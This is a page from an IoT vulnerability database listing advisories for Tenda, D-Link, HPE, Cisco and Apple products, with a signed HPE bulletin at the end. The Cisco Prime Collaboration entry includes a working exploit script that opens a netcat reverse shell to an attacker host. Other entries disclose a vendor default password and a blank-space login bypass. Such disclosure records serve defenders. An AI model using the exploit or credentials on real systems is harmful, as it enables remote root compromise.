VARIoT IoT vulnerabilities database
| VAR-201705-3846 | CVE-2017-9138 | plural Tenda Router debug interface buffer error vulnerability |
CVSS V2: 7.7 CVSS V3: 8.0 Severity: HIGH |
There is a debug-interface vulnerability on some Tenda routers (FH1202/F1202/F1200: versions before 1.2.0.20). After connecting locally to a router in a wired or wireless manner, one can bypass intended access restrictions by sending shell commands directly and reading their results, or by entering shell commands that change this router's username and password. plural Tenda Router (FH1202/F1202/F1200) Debug interface contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. A security bypass vulnerability exists in the TendaFH1202, F1202, and F1200 routers using firmware prior to 1.2.0.20
| VAR-201705-3847 | CVE-2017-9139 | plural Tenda Router buffer error vulnerability |
CVSS V2: 2.7 CVSS V3: 3.5 Severity: LOW |
There is a stack-based buffer overflow on some Tenda routers (FH1202/F1202/F1200: versions before 1.2.0.20). Crafted POST requests to an unspecified URL result in DoS, interrupting the HTTP service (used to login to the web UI of a router) for 1 to 2 seconds. plural Tenda Router (FH1202/F1202/F1200) Contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. TendaFH1202, F1202 and F1200 are all wireless router products of Tenda
| VAR-201705-3845 | CVE-2017-9137 | Ceragon FibeAir IP-10 Vulnerabilities related to certificate and password management in wireless receivers |
CVSS V2: 7.5 CVSS V3: 7.3 Severity: HIGH |
Ceragon FibeAir IP-10 wireless radios through 7.2.0 have a default password of mateidu for the mateidu account (a hidden user account established by the vendor). This account can be accessed via both the web interface and SSH. In the web interface, this simply grants an attacker read-only access to the device's settings. However, when using SSH, this gives an attacker access to a Linux shell. NOTE: the vendor has commented "The mateidu user is a known user, which is mentioned in the FibeAir IP-10 User Guide. Customers are instructed to change the mateidu user password. Changing the user password fully solves the vulnerability.". Ceragon FibeAir IP-10 Wireless receivers contain vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CeragonFibeAirIP-10wirelessradios is a wireless microwave transmission device from Israel's Ceragon. A security vulnerability exists in CeragonFibeAirIP-10wirelessradios7.2.0 and earlier, which originated from the default password in the mateid account
| VAR-201705-3816 | CVE-2017-9100 | D-Link DIR-600M Device firmware login.cgi Vulnerabilities that bypass authentication |
CVSS V2: 8.3 CVSS V3: 8.8 Severity: HIGH |
login.cgi on D-Link DIR-600M devices with firmware 3.04 allows remote attackers to bypass authentication by entering more than 20 blank spaces in the password field during an admin login attempt. D-LinkDIR-600M is a wireless router product of D-Link. An authentication bypass vulnerability exists in the login.cgi file in the D-LinkDIR-600M device using firmware version 3.04
| VAR-201705-4203 | No CVE | Shanghai News Information Remote Command Execution Vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
InforCube Next Generation Firewall (NFW) is an integrated security gateway security solution.
There is a remote command execution vulnerability in Shanghai News's next-generation firewall system. Allows an attacker to write php code to a file by modifying the install.php post data package, and successfully executes the php code with this file to obtain a webshell.
| VAR-201705-4200 | No CVE | Buffalo routing product has a universal cookie forgery login vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Buffalo is a router made by an American company.
The Buffalo routing product has a general cookie forgery login vulnerability. An attacker can use the vulnerability to modify the cookie information, bypass login authentication and log in to the WEB console to obtain router control permissions.
| VAR-201802-0740 | CVE-2017-8959 | HPE MSA 1040 and MSA 2040 SAN Storage Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
An Authentication Bypass vulnerability in HPE MSA 1040 and HPE MSA 2040 SAN Storage in version GL220P008 and earlier and was found. HPE MSA 1040 and MSA 2040 SAN Storage Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. HPEMSA1040 and MSA2040SANStorage are storage devices of Hewlett Packard Enterprise (HPE). An elevation of privilege vulnerability exists in HPEMSA1040 and MSA2040SANStorageGL220P008 and earlier. A remote attacker can exploit this vulnerability to increase privileges.
An attacker may leverage these issues to bypass the authentication mechanism and gain unauthorized access or to gain elevated privileges. This may aid in further attacks
| VAR-201802-0741 | CVE-2017-8960 | HPE MSA 1040 and MSA 2040 SAN Storage Access control vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An Authentication Bypass vulnerability in HPE MSA 1040 and MSA 2040 SAN Storage IN version GL220P008 and earlier was found. HPE MSA 1040 and MSA 2040 SAN Storage Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. HPEMSA1040 and MSA2040SANStorage are storage devices of Hewlett Packard Enterprise (HPE). An authentication vulnerability exists in HPEMSA1040 and MSA2040SANStorageGL220P008 and earlier. A remote attacker could exploit the vulnerability to bypass authentication.
An attacker may leverage these issues to bypass the authentication mechanism and gain unauthorized access or to gain elevated privileges. This may aid in further attacks
| VAR-201705-3236 | CVE-2017-2522 | plural Apple Product CoreFoundation Vulnerability in arbitrary code execution in components |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. tvOS before 10.2.1 is affected. watchOS before 3.2.2 is affected. The issue involves the "CoreFoundation" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted data. Apple iOS, WatchOS, macOS and tvOS are prone to a memory corruption vulnerability. Failed exploit attempts may result in a denial-of-service condition.
The following versions fixes the issue:
Versions prior to Apple iOS 10.3.2
Versions prior to Apple watchOS 3.2.2
Versions prior to Apple tvOS 10.2.1
Versions prior to Apple macOS 10.12.5. Apple iOS is an operating system developed for mobile devices; watchOS is an operating system for smart watches. CoreFoundation is one of the C language application programming interface (API) components
| VAR-201802-0717 | CVE-2017-8979 | HPE Integrated Lights-Out 2 Vulnerabilities related to authorization, authority, and access control in firmware |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Security vulnerabilities in the HPE Integrated Lights-Out 2 (iLO 2) firmware could be exploited remotely to allow authentication bypass, code execution, and denial of service. HPE Integrated Lights-Out 2 (iLO 2) is a set of remote control solutions from Hewlett Packard Enterprise (HPE) in the United States. This solution enables remote monitoring and operation and maintenance of IT assets such as servers. A security vulnerability exists in HPE iLO 2 version 2.29
| VAR-201705-4032 | CVE-2017-9024 | Secure Bytes Secure Cisco Auditor Bundled with Secure Bytes Cisco Configuration Manager Vulnerable to directory traversal |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. An attacker could exploit this vulnerability to read arbitrary files
| VAR-201705-3667 | CVE-2017-6195 | Ipswitch MOVEit Transfer In SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Ipswitch MOVEit Transfer (formerly DMZ) allows pre-authentication blind SQL injection. The fixed versions are MOVEit Transfer 2017 9.0.0.201, MOVEit DMZ 8.3.0.30, and MOVEit DMZ 8.2.0.20. Ipswitch MOVEit Transfer ( Old DMZ) Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Ipswitch MOVEit Transfer (formerly known as DMZ) is an automated file transfer system developed by Ipswitch in the United States. The system supports control, management, and visibility into all business-critical file transfer activities through a single, secure system. A security vulnerability exists in Ipswitch MOVEit Transfer. An attacker could exploit the vulnerability to bypass the protection mechanism
| VAR-201705-3658 | CVE-2017-6636 | Cisco Prime Collaboration Provisioning Software Web Path traversal vulnerability in the interface |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 11.1) could allow an authenticated, remote attacker to view any file on an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to view any file on the system. Cisco Bug IDs: CSCvc99604. Vendors have confirmed this vulnerability Bug ID CSCvc99604 It is released as.Information may be obtained. Authentication is not required to exploit this vulnerability.The specific flaw exists within the service that listens on TCP port 443 by default. Access to the /logs/cupm directory is unrestricted. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Information harvested may aid in launching further attacks. The software is IP Telephony, Voicemail, and Unified Communications environments provide IP Communication service function
| VAR-201808-0666 | CVE-2017-8990 | HPE Intelligent Management Center Wireless Service Manager Vulnerability in software |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A remote code execution vulnerability was identified in HPE Intelligent Management Center (iMC) Wireless Service Manager (WSM) Software earlier than version WSM 7.3 (E0506). This issue was resolved in HPE IMC Wireless Services Manager Software IMC WSM 7.3 E0506P01 or subsequent version. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of the strMac parameter provided to the macToByte method. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. The solution provides network-wide visibility for comprehensive management of resources, services and users. Wireless Service Manager (WSM) Software is one of the wireless service management software. The vulnerability stems from the fact that the program does not verify the length of the data submitted by the user, causing the size of the copied data to exceed the fixed-length buffer space based on the stack
| VAR-201705-3737 | CVE-2017-6622 | Cisco Prime Collaboration Provisioning of Web Vulnerabilities that bypass authentication in the interface |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724. Authentication is not required to exploit this vulnerability.The specific flaw exists within the ScriptMgr servlet, which listens on TCP port 443 by default. A crafted request can bypass authentication for this resource. An attacker can leverage this vulnerability to execute arbitrary code under the context of root.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments.
# Usage: ./prime-shell.sh <TARGET-IP> <ATTACKER-IP> <ATTACKER-PORT>
function encode() {
echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'
}
TARGET=$1
ATTACKER=$2
PORT=$3
BASH=$(encode "/bin/bash")
COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f")
SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});"
curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"
| VAR-201705-3736 | CVE-2017-6621 | Cisco Prime Collaboration Provisioning of Web Vulnerabilities accessing critical data in the interface |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to access sensitive data. The attacker could use this information to conduct additional reconnaissance attacks. The vulnerability is due to insufficient protection of sensitive data when responding to an HTTP request on the web interface. An attacker could exploit the vulnerability by sending a crafted HTTP request to the application to access specific system files. An exploit could allow the attacker to obtain sensitive information about the application which could include user credentials. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases 10.6 through 11.5. Cisco Bug IDs: CSCvc99626. Authentication is not required to exploit this vulnerability.The specific flaw exists within the logconfigtracer.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose any files accessible to the root user. This may result in further attacks. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments
| VAR-201705-3657 | CVE-2017-6635 | Cisco Prime Collaboration Provisioning Software Web Vulnerabilities related to authorization, authority, and access control in the interface |
CVSS V2: 6.8 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 12.1) could allow an authenticated, remote attacker to delete any file from an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to delete any file from the system. Cisco Bug IDs: CSCvc99597. Vendors have confirmed this vulnerability Bug ID CSCvc99597 It is released as.Information may be tampered with. Authentication is not required to exploit this vulnerability.The specific flaw exists within the licensestatus.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments
| VAR-201705-3671 | CVE-2017-6652 | Cisco TelePresence IX5000 Series Web Vulnerability to access arbitrary files on affected devices in the framework |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web framework of the Cisco TelePresence IX5000 Series could allow an unauthenticated, remote attacker to access arbitrary files on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using directory traversal techniques to read files within the Cisco TelePresence IX5000 Series filesystem. This vulnerability affects Cisco TelePresence IX5000 Series devices running software version 8.2.0. Cisco Bug IDs: CSCvc52325. Information harvested may aid in launching further attacks. The solution provides components such as audio and video space, which can provide remote participants with a face-to-face virtual meeting room effect
| VAR-201705-3659 | CVE-2017-6637 | Cisco Prime Collaboration Provisioning Software Web Path traversal vulnerability in the interface |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 11.1) could allow an authenticated, remote attacker to delete any file from an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to delete any file from the system. Cisco Bug IDs: CSCvc99618. Vendors have confirmed this vulnerability Bug ID CSCvc99618 It is released as.Information may be tampered with. Authentication is not required to exploit this vulnerability.The specific flaw exists within the logconfigtracer.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments
| VAR-201808-0663 | CVE-2017-8987 | HPE Integrated Lights-Out 3 Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.8 CVSS V3: 8.6 Severity: HIGH |
A Unauthenticated Remote Denial of Service vulnerability was identified in HPE Integrated Lights-Out 3 (iLO 3) version v1.88 only. The vulnerability is resolved in iLO3 v1.89 or subsequent versions.
Exploiting this issue allows remote attackers to trigger denial-of-service conditions. HPE Integrated Lights-Out 3 (iLO3) is an embedded server management technology of Hewlett Packard Enterprise (HPE), which uses an integrated remote management port to monitor and maintain the health of the server and remotely manage the server wait. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03826en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03826en_us
Version: 1
HPESBHF03826 rev.1 - HPE Integrated Lights-Out 3 (iLO 3) Remote Denial of
Service
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
References:
- CVE-2017-8987
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQEcBAEBCAAGBQJalX6NAAoJELXhAxt7SZaidm8H/0o/kMTpJiRFB7LlHsfEVWKZ
NiJd/DFVmKbkqFS20jAKC7k8a0PdHxkDJ8svUEGOzbUGDcJX9TfIjqk1sSYkMs+c
4i0qlyyH3VtpZy10A26gP9qsLVrOm2b0skfmEtuqCsXRFe6/OH5dppelSukFStwN
/L3Mvga3Ti/wUYNlx83Vsfhdm+WYZXEBV9yG2G/So0chIEJwB7nxtj/kmDXr6vPT
zoV4RZ1QaNQ6DebxGdgRIcxDTIB6wRSPB4bDldc+VhiPbAXJ0wcx1llloEdkvwvg
UPw+tkb4U4at47iGa3+FrOONP/4kmPBcHQRxRp3EzmrdS7Oexr5zAAphx6aOb04=
=NVRE
-----END PGP SIGNATURE-----